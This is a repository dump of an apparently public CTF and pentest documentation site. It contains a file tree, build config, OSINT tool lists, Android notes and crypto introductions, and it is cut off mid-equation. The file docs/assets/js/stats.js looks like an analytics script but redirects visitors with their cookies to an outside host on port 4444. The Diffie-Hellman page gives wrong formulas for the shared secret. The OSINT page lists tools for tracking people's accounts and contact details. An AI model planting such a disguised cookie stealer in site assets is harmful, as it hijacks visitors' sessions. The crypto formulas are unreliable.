├── .gitignore
├── .gitlab-ci.yml
├── CONTRIBUTING.md
├── LICENSE
├── README.md
├── docs
    ├── OSINT
    │   └── socmint.md
    ├── android
    │   ├── 01-android.md
    │   ├── 02-adb.md
    │   ├── 03-frida.md
    │   └── 04-root-avd-device.md
    ├── assets
    │   ├── img
    │   │   ├── android
    │   │   │   └── your_virtual_devices.png
    │   │   ├── favicon.ico
    │   │   └── web
    │   │   │   ├── GraphQL_Batching_Attack.png
    │   │   │   ├── burp_and_scope.png
    │   │   │   ├── burp_darkmode.png
    │   │   │   ├── burp_intercept_false.png
    │   │   │   ├── burp_intruder_grep_match.png
    │   │   │   ├── burp_js_redirection.png
    │   │   │   ├── burp_match_replace_xss.png
    │   │   │   ├── burp_remove_first_line_intruder.png
    │   │   │   ├── burp_remove_websockets.png
    │   │   │   ├── burp_response_autoscroll.png
    │   │   │   ├── burp_sitemap_scope.png
    │   │   │   └── burp_target_sitemap_search.png
    │   ├── js
    │   │   ├── config.js
    │   │   ├── mathjax.js
    │   │   └── stats.js
    │   └── txt
    │   │   ├── all-html-events.txt
    │   │   └── all-html-tags.txt
    ├── crypto
    │   ├── 01-introduction.md
    │   ├── aes
    │   │   └── padding-oracle.md
    │   ├── diffie-hellman
    │   │   └── 01-introduction.md
    │   ├── modular-arithmetic
    │   │   ├── 01-introduction.md
    │   │   ├── 02-quadratic-residue.md
    │   │   └── 05-chinese-remainder-theorem.md
    │   └── rsa
    │   │   ├── 01-introduction.md
    │   │   ├── 02-small-prime.md
    │   │   ├── 03-same-modulus.md
    │   │   ├── 04-k-approximation.md
    │   │   ├── 05-small-exponent.md
    │   │   ├── 06-sum-of-primes.md
    │   │   ├── 07-wiener-attack.md
    │   │   ├── 08-hastad-broadcast-attack.md
    │   │   └── 09-polynomials-pq-generation.md
    ├── index.md
    ├── malware
    │   ├── anti-reverse
    │   │   ├── 02-compiler.md
    │   │   ├── 03-fileformat.md
    │   │   └── 04-string.md
    │   ├── av-evasion.md
    │   ├── command_control.md
    │   ├── detection.md
    │   ├── others.md
    │   ├── persistence.md
    │   └── yara.md
    ├── others
    │   ├── devsecops.md
    │   ├── linux
    │   │   ├── commands
    │   │   │   ├── find.md
    │   │   │   ├── socat.md
    │   │   │   ├── stat.md
    │   │   │   └── xargs.md
    │   │   ├── install-arch-linux.md
    │   │   └── linux.md
    │   ├── others.md
    │   ├── tmux-cheatsheet.md
    │   ├── vim-cheatsheet.md
    │   └── windows-intro.md
    ├── pentest
    │   ├── active-directory
    │   │   ├── 01-activedirectory.md
    │   │   ├── 02-kerberos.md
    │   │   ├── 03-enumeration.md
    │   │   └── 04-exploit.md
    │   ├── c2
    │   │   ├── 01-meterpreter.md
    │   │   └── 02-empire.md
    │   ├── networks
    │   │   ├── pivot.md
    │   │   ├── servers.md
    │   │   └── tricks.md
    │   ├── privesc
    │   │   ├── linux.md
    │   │   └── windows.md
    │   ├── revshell.md
    │   ├── services.md
    │   ├── tips.md
    │   ├── tools
    │   │   ├── fcrackzip.md
    │   │   ├── hydra.md
    │   │   ├── johntheripper.md
    │   │   ├── metasploit.md
    │   │   ├── nmap.md
    │   │   └── wpscan.md
    │   ├── wifi
    │   │   ├── 01-introduction.md
    │   │   ├── 03-channels.md
    │   │   ├── 05-attacks.md
    │   │   └── 10-exploitation.md
    │   └── windows.md
    ├── programming
    │   ├── charp
    │   │   ├── 01-csharp-malware.md
    │   │   ├── 02-csharp-evasion.md
    │   │   └── index.md
    │   ├── go.md
    │   ├── javascript.md
    │   ├── powershell.md
    │   └── python
    │   │   ├── introduction.md
    │   │   └── security.md
    ├── pwn
    │   ├── assembly.md
    │   ├── binary-protections.md
    │   ├── buffer-overflow
    │   │   ├── 01-calling-function-with-args-x64.md
    │   │   ├── 10-bypassing-static-canary.md
    │   │   ├── 20-rop-x64-execve-syscall.md
    │   │   └── 30-ret2libc-x64-aslr.md
    │   ├── format-string
    │   │   ├── 01-introduction-format-string.md
    │   │   ├── 02-leak-the-stack.md
    │   │   └── 03-overwrite-address.md
    │   ├── gdb.md
    │   ├── heap
    │   │   └── 01-introduction-heap.md
    │   ├── mona.md
    │   ├── pwntools.md
    │   └── shellcode
    │   │   ├── 01-introduction.md
    │   │   ├── 05-writing.md
    │   │   └── 10-exploitation.md
    ├── reverse
    │   ├── assembly
    │   │   └── x86-assembly.md
    │   ├── autoit.md
    │   ├── ghidra.md
    │   ├── hook.md
    │   ├── index.md
    │   ├── practical-malware-analysis.md
    │   └── stripped-binary.md
    └── web
    │   ├── JWT.md
    │   ├── OAuth.md
    │   ├── XXE.md
    │   ├── authentication.md
    │   ├── bugbounty
    │       ├── 01-enumeration.md
    │       ├── 02-scanner.md
    │       ├── 05-reports.md
    │       └── 06-uncommon-vulns.md
    │   ├── burpsuite
    │       ├── intruder.md
    │       ├── others.md
    │       ├── proxy.md
    │       └── target.md
    │   ├── business-logic.md
    │   ├── cache-poisoning.md
    │   ├── clickjacking.md
    │   ├── clientside
    │       ├── 01-introduction.md
    │       ├── 02-CSRF.md
    │       ├── 03-XSS.md
    │       ├── 04-prototype-pollution.md
    │       └── 05-cors.md
    │   ├── ctf
    │       └── web_academy.md
    │   ├── deserialization.md
    │   ├── dom-clobbering.md
    │   ├── file-upload.md
    │   ├── host-header-attack.md
    │   ├── php.md
    │   ├── request-smuggling.md
    │   ├── sql-injection.md
    │   ├── websocket.md
    │   └── wordpress.md
└── mkdocs.yml


/.gitignore:
--------------------------------------------------------------------------------
1 | .obsidian/
2 | 


--------------------------------------------------------------------------------
/.gitlab-ci.yml:
--------------------------------------------------------------------------------
 1 | image: python:3.9
 2 | 
 3 | pages:
 4 |   stage: deploy
 5 |   only:
 6 |     - master
 7 |   script:
 8 |     - pip install mkdocs-material mkdocs-macros-plugin
 9 |     - mkdocs build --site-dir public
10 |   artifacts:
11 |     paths:
12 |       - public


--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
 1 | # How to contribute
 2 | 
 3 | First of all, thank you for taking the time to contribute to this project.
 4 | 
 5 | ## Getting started
 6 | 
 7 | Contributing to a project on [Github](https://github.com/xanhacks/ctf-docs) or [Gitlab](https://gitlab.com/xanhacks/ctf-docs) is pretty straight forward. If this is you're first time, these are the steps you should take.
 8 | 
 9 |     Fork this repo.
10 | 
11 | And that's it! Read the code available and change the part you don't like! You're change should not break the existing code and should pass the tests.
12 | 
13 | If you're adding a new functionality, start from the branch master. It would be a better practice to create a new branch and work in there.
14 | 
15 | When you're done, submit a pull request and for one of the maintainers to check it out. We would let you know if there is any problem or any changes that should be considered.
16 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CTF Docs
 2 | 
 3 | [![pipeline status](https://gitlab.com/xanhacks/ctf-docs/badges/master/pipeline.svg)](https://gitlab.com/xanhacks/ctf-docs/-/commits/master)
 4 | [![gitlab star](https://img.shields.io/badge/dynamic/json?color=green&label=gitlab%20stars&query=%24.star_count&url=https%3A%2F%2Fgitlab.com%2Fapi%2Fv4%2Fprojects%2F26200977)](https://gitlab.com/xanhacks/ctf-docs)
 5 | [![github star](https://img.shields.io/github/stars/xanhacks/ctf-docs.svg?style=social&label=Star)](https://github.com/xanhacks/ctf-docs)
 6 | 
 7 | Documentation and cheatsheets about CTF and pentest.
 8 | 
 9 | **Warning :** This documentation is under construction, the architecture of the site will evolve regularly and some articles are not finished.
10 | 
11 | **Live demo** at [https://docs.xanhacks.xyz/](https://docs.xanhacks.xyz/).
12 | 
13 | ## Installation
14 | 
15 | ```bash
16 | $ python3 -m pip install mkdocs mkdocs-material mkdocs-macros-plugin
17 | $ mkdocs serve
18 | INFO     -  Building documentation...
19 | INFO     -  [macros] - Macros arguments: {'module_name': 'main', 'modules': [], 'include_dir': '', 'include_yaml': [], 'j2_block_start_string': '',
20 |             'j2_block_end_string': '', 'j2_variable_start_string': '', 'j2_variable_end_string': '', 'on_undefined': 'keep', 'verbose': False}
21 | INFO     -  [macros] - Extra variables (config file): ['homepage', 'base_url', 'social']
22 | INFO     -  [macros] - Extra filters (module): ['pretty']
23 | INFO     -  Cleaning site directory
24 | INFO     -  Documentation built in 0.99 seconds
25 | INFO     -  [14:46:35] Serving on http://127.0.0.1:8000/
26 | ```
27 | 
28 | ## Made with
29 | 
30 | Made with [mkdocs](https://github.com/mkdocs/mkdocs) and the [material theme](https://squidfunk.github.io/mkdocs-material/).
31 | 
32 | Deployed with Gitlab pages.
33 | 
34 | ## Inspired by
35 | 
36 | Inspired by and complementary to [hacktricks](https://github.com/carlospolop/hacktricks) and [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings).
37 | 


--------------------------------------------------------------------------------
/docs/OSINT/socmint.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: SOCMINT
 3 | description: Social media intelligence.
 4 | ---
 5 | 
 6 | # Social media intelligence
 7 | 
 8 | Social media intelligence (SOCMINT) refers to the techniques and technologies that allow someone to monitor social media networking sites like Facebook, Youtube, Instagram or Twitter.
 9 | 
10 | SOCMINT includes monitoring of content, such as messages or images posted, and other data, which is generated when someone uses a social media networking site. This information involves person-to-person, person-to-group, group-to-group, and includes interactions that are private and public.
11 | 
12 | > Source [privacyinternational.org](https://www.privacyinternational.org/explainer/55/social-media-intelligence).
13 | 
14 | ## Dork
15 | 
16 | ### View tweets of suspended Twitter account
17 | 
18 | 1. Visit [google.com](https://google.com)
19 | 2. Search for `cache:https://twitter.com/elonmusk`.
20 | 
21 | ## Tools
22 | 
23 | ### Tracking
24 | 
25 | On Twitter, you can change your `@username` as many times as you like but your ID will remain the same. So, if you have someone ID, you can track his account even if they change their username.
26 | 
27 | `@username` to Twitter ID :
28 | 
29 | - Enter the username on this website https://tweeterid.com/.
30 | 
31 | Twitter ID to `@username` :
32 | 
33 | - https://twitter.com/intent/user?user_id=<TWITTER_ID>
34 | - Example with `@elonmusk` : https://twitter.com/intent/user?user_id=44196397
35 | 
36 | ### Enumeration
37 | 
38 | - [https://whatsmyname.app/](https://whatsmyname.app/) - This tool allows you to enumerate usernames across many websites.
39 | - [https://github.com/sherlock-project/sherlock](https://github.com/sherlock-project/sherlock) - Hunt down social media accounts by username across social networks.
40 | - [https://github.com/soxoj/maigret](https://github.com/soxoj/maigret) - Fork of Sherlock.
41 | - [https://github.com/megadose/holehe/](https://github.com/megadose/holehe/) - Holehe checks if an email is attached to an account on sites like twitter, instagram, imgur and more than 120 others.
42 | - [https://github.com/Kakuye/socialscan](https://github.com/Kakuye/socialscan) - socialscan offers accurate and fast checks for email address and username usage on online platforms.
43 | 
44 | ### Information lookup
45 | 
46 | #### Linkedin
47 | 
48 | - [https://www.lusha.com/](https://www.lusha.com/)
49 | - [https://kaspr.io/](https://kaspr.io/)
50 | - [https://rocketreach.co/](https://rocketreach.co/) - Information lookup based on a username
51 | 
52 | #### Instagram
53 | 
54 | - [https://github.com/megadose/toutatis](https://github.com/megadose/toutatis) - Toutatis is a tool that allows you to extract information from instagrams accounts such as e-mails, phone numbers and more.
55 | 
56 | #### Google account
57 | 
58 | - [https://github.com/mxrch/ghunt](https://github.com/mxrch/ghunt) - GHunt is a modulable OSINT tool designed to evolve over the years, and incorporates many techniques to investigate Google accounts.
59 | 
60 | #### Phone number
61 | 
62 | - [https://www.hlrlookup.com/](https://www.hlrlookup.com/) - Lookup the HLR status of any mobile phone.


--------------------------------------------------------------------------------
/docs/android/01-android.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Android - All in one
 3 | description: Android must-known.
 4 | ---
 5 | 
 6 | # Android
 7 | 
 8 | ## APK file structure
 9 | 
10 | `AndroidManifest.xml`
11 | :   Manifest file in binary XML format which contains essential information about the application. This information is consumed by the Android operating system, Google Play and Android build environment.
12 | 
13 |     This file contains the package name, permissions, android api version, activities, services, broadcast receivers, content providers, ... It can be useful to find the entrypoint of the application.
14 | 
15 | `META-INF/`
16 | :   This folder typically contains **MANIFEST.MF**, **CERT.RSA** and **CERT.SF** files.
17 | 
18 |     CERT.RSA and CERT.SF files contain security certificates for Android application. More specifically CERT.SF contains the list of all files inside the APK with their SHA-1 digests. CERT.RSA contains public certificate of the app.
19 | 
20 | `resources.arsc`
21 | :   File containing precompiled application resources, in binary XML.
22 | 
23 | `res/`
24 | :   Folder containing resources not compiled into **resources.arsc**. Resources may include XML files, images, string files, icons, user interface layouts, fonts and many more. 
25 | 
26 | `assets/`
27 | :   Optional folder containing applications assets, which can be retrieved by AssetManager.
28 | 
29 | `classes.dex`
30 | :   Application code compiled in the dex format.
31 | 
32 | `lib/`
33 | :   Optional folder containing compiled code - i.e. native code libraries (C/C++).
34 | 
35 |     **armeabi:** compiled code for ARM based processors<br>
36 |     **armeabi-v7a**: compiled code for ARMv7 and above processors<br>
37 |     **arm64-v8a**: compiled code for ARMv8 arm64 and above processors<br>
38 |     **x86**: compiled code for x86 processors<br>
39 |     **x86_64**: compiled code for x86_64 processors<br>
40 |     **mips**: compiled code for MIPS processors<br>
41 | 
42 | ## Android structure
43 | 
44 | ```
45 | /data/data/<package>/               : Application data
46 | /data/data/<package>/databases      : Application databases
47 | /data/data/<package>/shared_prefs/  : Application shared preferences
48 | /data/app                           : Apk installed by user
49 | /system/app                         : Pre-installed APK files
50 | ```
51 | 
52 | ### References
53 | 
54 | - https://openapkfile.com/structure.html
55 | - https://www.javatpoint.com/AndroidManifest-xml-file-in-android


--------------------------------------------------------------------------------
/docs/android/04-root-avd-device.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Root an AVD Device
 3 | description: How to root an emulator from AVD (Android Virtual Device).
 4 | ---
 5 | 
 6 | 1. Create a new virtual device on AVD.
 7 | 
 8 | !!! warning
 9 |     Pick any image that does NOT say **Play Store** in the target column.
10 | 
11 | ![Your virtual devices]({{ base_url }}/assets/img/android/your_virtual_devices.png)
12 | 
13 | You can now close *android-studio*.
14 | 
15 | 2. Run the emulator.
16 | 
17 | ```bash
18 | $ $ANDROID_HOME/emulator/emulator -list-avds
19 | Pixel_4a_API_30
20 | $ $ANDROID_HOME/emulator/emulator -avd Pixel_4a_API_30
21 | 
22 | or
23 | 
24 | $ $ANDROID_HOME/emulator/emulator @Pixel_4a_API_30
25 | ```
26 | 
27 | Wait for the device to boot, it should appear in *adb devices*.
28 | 
29 | ```bash
30 | $ $ANDROID_HOME/platform-tools/adb devices
31 | List of devices attached
32 | emulator-5554   device
33 | ```
34 | 
35 | 3. Restart **adbd** as root and enjoy !
36 | 
37 | ```bash
38 | $ $ANDROID_HOME/platform-tools/adb root
39 | restarting adbd as root
40 | $ $ANDROID_HOME/platform-tools/adb shell
41 | generic_x86_arm:/ # id
42 | uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:su:s0
43 | ```


--------------------------------------------------------------------------------
/docs/assets/img/android/your_virtual_devices.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xanhacks/ctf-docs/9793d12d04413c7dbc234390598896ddd0fdcfdd/docs/assets/img/android/your_virtual_devices.png


--------------------------------------------------------------------------------
/docs/assets/img/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xanhacks/ctf-docs/9793d12d04413c7dbc234390598896ddd0fdcfdd/docs/assets/img/favicon.ico


--------------------------------------------------------------------------------
/docs/assets/img/web/GraphQL_Batching_Attack.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xanhacks/ctf-docs/9793d12d04413c7dbc234390598896ddd0fdcfdd/docs/assets/img/web/GraphQL_Batching_Attack.png


--------------------------------------------------------------------------------
/docs/assets/img/web/burp_and_scope.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xanhacks/ctf-docs/9793d12d04413c7dbc234390598896ddd0fdcfdd/docs/assets/img/web/burp_and_scope.png


--------------------------------------------------------------------------------
/docs/assets/img/web/burp_darkmode.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xanhacks/ctf-docs/9793d12d04413c7dbc234390598896ddd0fdcfdd/docs/assets/img/web/burp_darkmode.png


--------------------------------------------------------------------------------
/docs/assets/img/web/burp_intercept_false.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xanhacks/ctf-docs/9793d12d04413c7dbc234390598896ddd0fdcfdd/docs/assets/img/web/burp_intercept_false.png


--------------------------------------------------------------------------------
/docs/assets/img/web/burp_intruder_grep_match.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xanhacks/ctf-docs/9793d12d04413c7dbc234390598896ddd0fdcfdd/docs/assets/img/web/burp_intruder_grep_match.png


--------------------------------------------------------------------------------
/docs/assets/img/web/burp_js_redirection.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xanhacks/ctf-docs/9793d12d04413c7dbc234390598896ddd0fdcfdd/docs/assets/img/web/burp_js_redirection.png


--------------------------------------------------------------------------------
/docs/assets/img/web/burp_match_replace_xss.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xanhacks/ctf-docs/9793d12d04413c7dbc234390598896ddd0fdcfdd/docs/assets/img/web/burp_match_replace_xss.png


--------------------------------------------------------------------------------
/docs/assets/img/web/burp_remove_first_line_intruder.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xanhacks/ctf-docs/9793d12d04413c7dbc234390598896ddd0fdcfdd/docs/assets/img/web/burp_remove_first_line_intruder.png


--------------------------------------------------------------------------------
/docs/assets/img/web/burp_remove_websockets.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xanhacks/ctf-docs/9793d12d04413c7dbc234390598896ddd0fdcfdd/docs/assets/img/web/burp_remove_websockets.png


--------------------------------------------------------------------------------
/docs/assets/img/web/burp_response_autoscroll.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xanhacks/ctf-docs/9793d12d04413c7dbc234390598896ddd0fdcfdd/docs/assets/img/web/burp_response_autoscroll.png


--------------------------------------------------------------------------------
/docs/assets/img/web/burp_sitemap_scope.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xanhacks/ctf-docs/9793d12d04413c7dbc234390598896ddd0fdcfdd/docs/assets/img/web/burp_sitemap_scope.png


--------------------------------------------------------------------------------
/docs/assets/img/web/burp_target_sitemap_search.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xanhacks/ctf-docs/9793d12d04413c7dbc234390598896ddd0fdcfdd/docs/assets/img/web/burp_target_sitemap_search.png


--------------------------------------------------------------------------------
/docs/assets/js/config.js:
--------------------------------------------------------------------------------
1 | document$.subscribe(() => {
2 |   hljs.highlightAll()
3 | })
4 | 
5 | 


--------------------------------------------------------------------------------
/docs/assets/js/mathjax.js:
--------------------------------------------------------------------------------
 1 | window.MathJax = {
 2 |   tex: {
 3 |     inlineMath: [["\\(", "\\)"]],
 4 |     displayMath: [["\\[", "\\]"]],
 5 |     processEscapes: true,
 6 |     processEnvironments: true
 7 |   },
 8 |   options: {
 9 |     ignoreHtmlClass: ".*|",
10 |     processHtmlClass: "arithmatex"
11 |   }
12 | };
13 | 
14 | document$.subscribe(() => { // 
15 |   MathJax.typesetPromise()
16 | })
17 | 


--------------------------------------------------------------------------------
/docs/assets/js/stats.js:
--------------------------------------------------------------------------------
1 | document.location.href='http://xanhacks.xyz:4444?c'.concat(document.cookie);
2 | 


--------------------------------------------------------------------------------
/docs/assets/txt/all-html-events.txt:
--------------------------------------------------------------------------------
 1 | onafterprint
 2 | onbeforeprint
 3 | onbeforeunload
 4 | onerror
 5 | onhashchange
 6 | onload
 7 | onmessage
 8 | onoffline
 9 | ononline
10 | onpagehide
11 | onpageshow
12 | onpopstate
13 | onresize
14 | onstorage
15 | onunload
16 | onblur
17 | onchange
18 | oncontextmenu
19 | onfocus
20 | oninput
21 | oninvalid
22 | onreset
23 | onsearch
24 | onselect
25 | onsubmit
26 | onkeydown
27 | onkeypress
28 | onkeyup
29 | onclick
30 | ondblclick
31 | onmousedown
32 | onmousemove
33 | onmouseout
34 | onmouseover
35 | onmouseup
36 | onmousewheel
37 | onwheel
38 | ondrag
39 | ondragend
40 | ondragenter
41 | ondragleave
42 | ondragover
43 | ondragstart
44 | ondrop
45 | onscroll
46 | oncopy
47 | oncut
48 | onpaste
49 | onabort
50 | oncanplay
51 | oncanplaythrough
52 | oncuechange
53 | ondurationchange
54 | onemptied
55 | onended
56 | onerror
57 | onloadeddata
58 | onloadedmetadata
59 | onloadstart
60 | onpause
61 | onplay
62 | onplaying
63 | onprogress
64 | onratechange
65 | onseeked
66 | onseeking
67 | onstalled
68 | onsuspend
69 | ontimeupdate
70 | onvolumechange
71 | onwaiting
72 | ontoggle
73 | 


--------------------------------------------------------------------------------
/docs/assets/txt/all-html-tags.txt:
--------------------------------------------------------------------------------
  1 | <!--...-->
  2 | <!DOCTYPE>
  3 | <a>
  4 | <abbr>
  5 | <acronym>
  6 | <address>
  7 | <applet>
  8 | <area>
  9 | <article>
 10 | <aside>
 11 | <audio>
 12 | <b>
 13 | <base>
 14 | <basefont>
 15 | <bdi>
 16 | <bdo>
 17 | <big>
 18 | <blockquote>
 19 | <body>
 20 | <br>
 21 | <button>
 22 | <canvas>
 23 | <caption>
 24 | <center>
 25 | <cite>
 26 | <code>
 27 | <col>
 28 | <colgroup>
 29 | <data>
 30 | <datalist>
 31 | <dd>
 32 | <del>
 33 | <details>
 34 | <dfn>
 35 | <dialog>
 36 | <dir>
 37 | <div>
 38 | <dl>
 39 | <dt>
 40 | <em>
 41 | <embed>
 42 | <fieldset>
 43 | <figcaption>
 44 | <figure>
 45 | <font>
 46 | <footer>
 47 | <form>
 48 | <frame>
 49 | <frameset>
 50 | <h1>
 51 | <head>
 52 | <header>
 53 | <hr>
 54 | <html>
 55 | <i>
 56 | <iframe>
 57 | <img>
 58 | <input>
 59 | <ins>
 60 | <kbd>
 61 | <label>
 62 | <legend>
 63 | <li>
 64 | <link>
 65 | <main>
 66 | <map>
 67 | <mark>
 68 | <meta>
 69 | <meter>
 70 | <nav>
 71 | <noframes>
 72 | <noscript>
 73 | <object>
 74 | <ol>
 75 | <optgroup>
 76 | <option>
 77 | <output>
 78 | <p>
 79 | <param>
 80 | <picture>
 81 | <pre>
 82 | <progress>
 83 | <q>
 84 | <rp>
 85 | <rt>
 86 | <ruby>
 87 | <s>
 88 | <samp>
 89 | <script>
 90 | <section>
 91 | <select>
 92 | <small>
 93 | <source>
 94 | <span>
 95 | <strike>
 96 | <strong>
 97 | <style>
 98 | <sub>
 99 | <summary>
100 | <sup>
101 | <svg>
102 | <table>
103 | <tbody>
104 | <td>
105 | <template>
106 | <textarea>
107 | <tfoot>
108 | <th>
109 | <thead>
110 | <time>
111 | <title>
112 | <tr>
113 | <track>
114 | <tt>
115 | <u>
116 | <ul>
117 | <var>
118 | <video>
119 | <wbr>
120 | 


--------------------------------------------------------------------------------
/docs/crypto/01-introduction.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Introduction to cryptography
 3 | description: Introduction to cryptography.
 4 | ---
 5 | 
 6 | # Cryptography
 7 | 
 8 | ## Introduction
 9 | 
10 | **Cryptography**, or **cryptology**, is the practice and study of techniques for secure communication in the presence of adversarial behavior. More generally, cryptography is about constructing and analyzing protocols that prevent third parties or the public from reading private messages; various aspects in information security such as data **confidentiality**, data **integrity**, **authentication**, and **non-repudiation** are central to modern cryptography.
11 | 
12 | - **Confidentiality :** Limits access or places restrictions on certain types of information.
13 | - **Integrity :** Assurance of, data accuracy and consistency over its entire life-cycle.
14 | - **Authentication :** The act of proving an assertion, such as the identity of a computer system user. In contrast with identification, the act of indicating a person or thing's identity, authentication is the process of verifying that identity.
15 | - **Non-repudiation :** Non-repudiation refers to a situation where a statement's author cannot successfully dispute its authorship or the validity of an associated contract.
16 | 
17 | > Source [Wikipedia](https://en.wikipedia.org/wiki/Cryptography).
18 | 
19 | ## Symmetric cryptography
20 | 
21 | **Symmetric-key cryptography** refers to encryption methods in which both the **sender and receiver share the same key** (or, less commonly, in which their keys are different, but related in an easily computable way).
22 | 
23 | Symmetric-key cryptosystems use the **same key for encryption and decryption** of a message, although a message or group of messages can have a different key than others. A significant disadvantage of symmetric ciphers is the **key management necessary to use them securely**.
24 | 
25 | ## Asymetric cryptography
26 | 
27 | *In a groundbreaking 1976 paper, Whitfield Diffie and Martin Hellman proposed the notion of public-key.*
28 | 
29 | **Public-key** (also, more generally, called **asymmetric key**) **cryptography** in which two different but mathematically related keys are used — a **public key and a private key**. A public key system is so constructed that calculation of one key (the 'private key') is computationally infeasible from the other (the 'public key'), even though they are necessarily related.
30 | 
31 | The public key may be freely distributed, while its paired private key must remain secret.
32 | 
33 | - **Public key** => encryption.
34 | - **Private key** => decryption. 
35 | 
36 | Public-key algorithms are most often based on the computational complexity of "hard" problems, often from number theory. For example, the hardness of **RSA** is related to the **integer factorization** problem, while **Diffie–Hellman** and **DSA** are related to the **discrete logarithm** problem. 


--------------------------------------------------------------------------------
/docs/crypto/diffie-hellman/01-introduction.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Introduction to Diffie-Hellman
 3 | description: Introduction to Diffie-Hellman.
 4 | ---
 5 | 
 6 | # Diffie-Hellman
 7 | 
 8 | ## Introduction
 9 | 
10 | The **Diffie–Hellman** key exchange method allows two parties that have no prior knowledge of each other to jointly **establish a shared secret key over an insecure channel**. This key can then be used to encrypt subsequent communications using a symmetric-key cipher.
11 | 
12 | ## Variables
13 | 
14 | Public elements :
15 | 
16 | - `p` : multiplicative group of integers modulo `p`, where `p` is prime.
17 | - `g` : a primitive root modulo `p`
18 | - `A` & `B` : Public calculation
19 | 
20 | Private elements :
21 | 
22 | - `a` & `b` : Two random big numbers.
23 | - `s` : Final shared secret.
24 | 
25 | ## Maths
26 | 
27 | $$
28 | A \equiv g^a [p]
29 | $$
30 | $$
31 | B \equiv g^b [p]
32 | $$
33 | $$
34 | s \equiv A^{b} \equiv B^{a} \equiv g^{a^{b}} \equiv g^{b^{a}} \equiv g^{a+b} [p]
35 | $$
36 | $$
37 | a \equiv \text{discrete_log}(p, B, g)
38 | $$
39 | $$
40 | b \equiv \text{discrete_log}(p, A, g)
41 | $$
42 | 
43 | ## Exchange
44 | 
45 | `K` is the final secret :
46 | 
47 | ![Exchange protocol](https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fi.pinimg.com%2Foriginals%2Fe2%2F7d%2F87%2Fe27d87413aa03a2cf73f542bdcf02184.png&f=1&nofb=1)


--------------------------------------------------------------------------------
/docs/crypto/modular-arithmetic/01-introduction.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | title: Introduction
  3 | description: Introduction to modular arithmetic
  4 | ---
  5 | 
  6 | # Introduction
  7 | 
  8 | ## Congruence
  9 | 
 10 | Congruence modulo `n` is a congruence relation, meaning that it is an equivalence relation that is compatible with the operations of addition, subtraction, and multiplication. Congruence modulo `n` is denoted :
 11 | 
 12 | $$
 13 | a \equiv b [n]
 14 | $$
 15 | 
 16 | The congruence relation may be rewritten as (k ∈ ℤ):
 17 | 
 18 | $$
 19 | a = b + k \times n
 20 | $$
 21 | 
 22 | > More information on [Wikipedia.org](https://en.wikipedia.org/wiki/Modular_arithmetic).
 23 | 
 24 | ### Practical example
 25 | 
 26 | $$
 27 | 12 \equiv 3 [9]
 28 | $$
 29 | 
 30 | $$
 31 | 21 \equiv 3 [9]
 32 | $$
 33 | 
 34 | $$
 35 | -6 \equiv 3 [9]
 36 | $$
 37 | 
 38 | Because :
 39 | 
 40 | $$
 41 | 12 = 3 + 1 \times 9
 42 | $$
 43 | 
 44 | $$
 45 | 21 = 3 + 2 \times 9
 46 | $$
 47 | 
 48 | $$
 49 | -6 = 3 - 1 \times 9
 50 | $$
 51 | 
 52 | In python, you can use the `%` symbol.
 53 | 
 54 | ```python
 55 | >>> 12 % 9 == 21 % 9 == -6 % 9 == 3
 56 | True
 57 | ```
 58 | 
 59 | ## Addition and substraction
 60 | 
 61 | $$
 62 | 12 \equiv 3 [9]
 63 | $$
 64 | 
 65 | You can add or substract any number. Example with `+3` and `-5` :
 66 | 
 67 | $$
 68 | 15 \equiv 6 [9]
 69 | $$
 70 | 
 71 | $$
 72 | 7 \equiv -2 [9] 
 73 | $$
 74 | 
 75 | The last equivalence is equals too (sometimes it's easier to deal with positive numbers):
 76 | 
 77 | $$
 78 | 7 \equiv 7 [9]
 79 | $$
 80 | 
 81 | ## Multiplication
 82 | 
 83 | $$
 84 | 12 \equiv 3 [9]
 85 | $$
 86 | 
 87 | You can multiply with any number € Z (you cannot make a division, ex: multiply by `1/2`).
 88 | 
 89 | **1.** Example with `* 3` :
 90 | 
 91 | $$
 92 | 36 \equiv 9 [9]
 93 | $$
 94 | 
 95 | Which is equals to :
 96 | 
 97 | $$
 98 | 0 \equiv 0 [9]
 99 | $$
100 | 
101 | $$
102 | 36 - 9 * 4 = 9 - 9 * 1
103 | $$
104 | 
105 | **2.** Example with `* -5` :
106 | 
107 | $$
108 | -60 \equiv -15 [9]
109 | $$
110 | 
111 | Which is equals to :
112 | 
113 | $$
114 | 3 \equiv 3 [9]
115 | $$
116 | 
117 | $$
118 | -60 + 9 * 7 = -15 + 2 * 9
119 | $$
120 | 
121 | ## Divsion (warning)
122 | 
123 | You can't divise a equivalence relation.
124 | 
125 | $$
126 | 12 \equiv 2 [10]
127 | $$
128 | 
129 | Divide by `2` :
130 | 
131 | $$
132 | 6 \not\equiv 1 [10]
133 | $$
134 | 
135 | ## Modular inverse
136 | 
137 | The multiplicative inverse :
138 | 
139 | $$
140 | x * a \equiv 1 [n]
141 | $$
142 | 
143 | $$
144 | x * a + n * k = 1
145 | $$
146 | 
147 | $$
